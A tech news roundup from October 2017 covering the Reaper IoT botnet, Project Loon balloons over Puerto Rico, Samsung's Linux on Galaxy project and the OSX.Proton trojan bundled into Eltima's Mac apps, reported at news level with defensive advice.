Top Stories for the Week of October 25, 2017

Here are the stories we're following for the week of Wednesday October 25, 2017

A botnet of unknown intent has been discovered and is spreading at a frightening rate.

As we speak, miscreants are assembling a massive army of hacked "Internet of Things" devices – and at a much faster rate than previous botnets.

This new cyber-militia of compromised gadgets – dubbed IoT_reaper or Reaper by experts at Qihoo 360 Netlab – can be instructed by its masters to attack websites and kick services offline.

The botnet's foot-soldiers (mainly press-ganged, Internet-connected cameras, home routers, and similar gear) are located in more than a million organizations globally, claimed security biz Check Point on Thursday.

At first, it was assumed the malware that was infecting gizmos to form this latest army was a variant of the Mirai botnet that took over hundreds of thousands of internet-connected equipment in 2016. However, security researchers now think it's actually another family of malicious software. There's no word yet on what exactly the botnet will be used for either.

The Reaper malware is spreading globally by exploiting various vulnerabilities in embedded devices (such as CVE-2017-8225) to steal and use the usernames and passwords of the gadgets' web-based control panels; ultimately to commandeer them.

For example, one of the botnet's drones – a hacked camera running a GoAhead embedded web server on TCP port 81 – had a System.ini file that had been changed to include a Netcat command that opened a reverse shell: a backdoor, in other words. This gave Reaper masters the command line to the device. Once the botnet's malware was on the camera, it then attempted to infect other equipment on the Internet. Any subsequently hacked devices would also cruise up and down the information superhighway in search of more vulnerable gizmos to hijack.

Right now, check to make sure you're not exposing a vulnerable device to the Internet, apply patches if you can, look out for suspicious behavior on your network, and take a gadget offline if infected.

Google's "Project Loon" has brought Internet and cellular service to hurricane-devastated Puerto Rico.

Mobile phone data services have been boosted in blacked-out areas of hurricane-hit Puerto Rico by balloons that were provided by Google's parent company, Alphabet.

Project Loon devices beam signals between each other and to users on the ground.

This extends communications networks in places where infrastructure is scarce or has been damaged.

The balloons will allow residents with LTE phones to send and receive text messages and access the web.

However, much of the country is still without electricity and more than a quarter of the population lacks safe drinking water.

Alastair Westgarth, head of Project Loon, said, "This is the first time we have used our new machine learning powered algorithms to keep balloons clustered over Puerto Rico, so we're still learning how best to do this. As we get more familiar with the constantly shifting winds in this region, we hope to keep the balloons over areas where connectivity is needed for as long as possible."

Samsung hopes to succeed where other vendors have failed: they want to bring the full desktop Linux experience to smartphones.

Samsung wants to bring the full power of desktop Linux to its smartphones.

The mobile giant announced this week that the "Linux on Galaxy" project will give smartphones the capability to “run Linux-based distributions on mobile devices."

So if you dream of using the smartphone in your pocket as a desktop Linux PC, you’ll be pleased to know that Samsung clearly shares that dream.

Linux on Galaxy will, based on the information currently available, be distributed as an app. It will be able to run multiple operating systems (likely including Ubuntu).

Linux distros run on the exact same Linux kernel that Android uses, and with no virtualisation or emulation involved, performance (theoretically) should be excellent.

But the true power will be unlocked when used with the Samsung DeX desktop dock accessory. This allows compatible phones to connect to an external display, a mouse and keyboard, and other peripherals.

The Samsung Galaxy S8 phone already allows users to use Android apps on a larger screen with a “desktop” style Android UI when docked with the DeX.

But while Android is great as a smartphone (and tablet) OS it’s not so hot as a desktop one.

Samsung says its users want “the convenience of their mobile device but also sometimes need the tried-and-true desktop computing environment, especially when it comes to interacting with productivity tools and entertainment contents that are best viewed on a larger monitor”.

"Linux on Galaxy" is still in the early stages of development. There’s no word on which devices the initiative plans to support, so I wouldn’t suggest rushing out to buy something Samsung-branded just yet.

Motorola, Microsoft and Canonical all tried, and failed, to bring “convergence” to the masses.

Do you have Eltima Player or Folx on your Mac? You may need to wipe everything and reinstall macOS because a nasty bit of malware came with their popular software and is giving hackers full access to absolutely everything, including your iCloud account.

It's going to be an unpleasant week for some Mac users who are facing a complete system wipe and reinstall – after hackers stashed malware in legitimate applications.

Eltima Software, which makes the popular Elmedia Player and download manager Folx, has confessed the latest versions of those two apps came with an unwelcome extra: the rather horrid OSX.Proton malware.

The botnet, which was injected into downloads of the applications, was spotted by security shop ESET, which alerted Elmedia. A subsequent investigation revealed miscreants had got into the developer's servers, implanted the malware into the download files, and then let the company infect its users as they fetched the software.

Proton is a remote-control trojan designed specifically for Mac systems. It opens a backdoor granting root level command-line access to commandeer the computer – and can steal passwords, encryption and VPN keys, as well as crypto-currencies from infected systems. It can even gain access to a victim's iCloud account regardless of whether 2-factor authentication is used or not.

ESET warns that a total system OS reinstall is the only guaranteed way to totally rid your system of this Malware.

License

If you post these videos, please provide credit along with a link back to http://www.category5.tv. Please consider donating to help us offset the high cost of offering free video to you, and the entire world.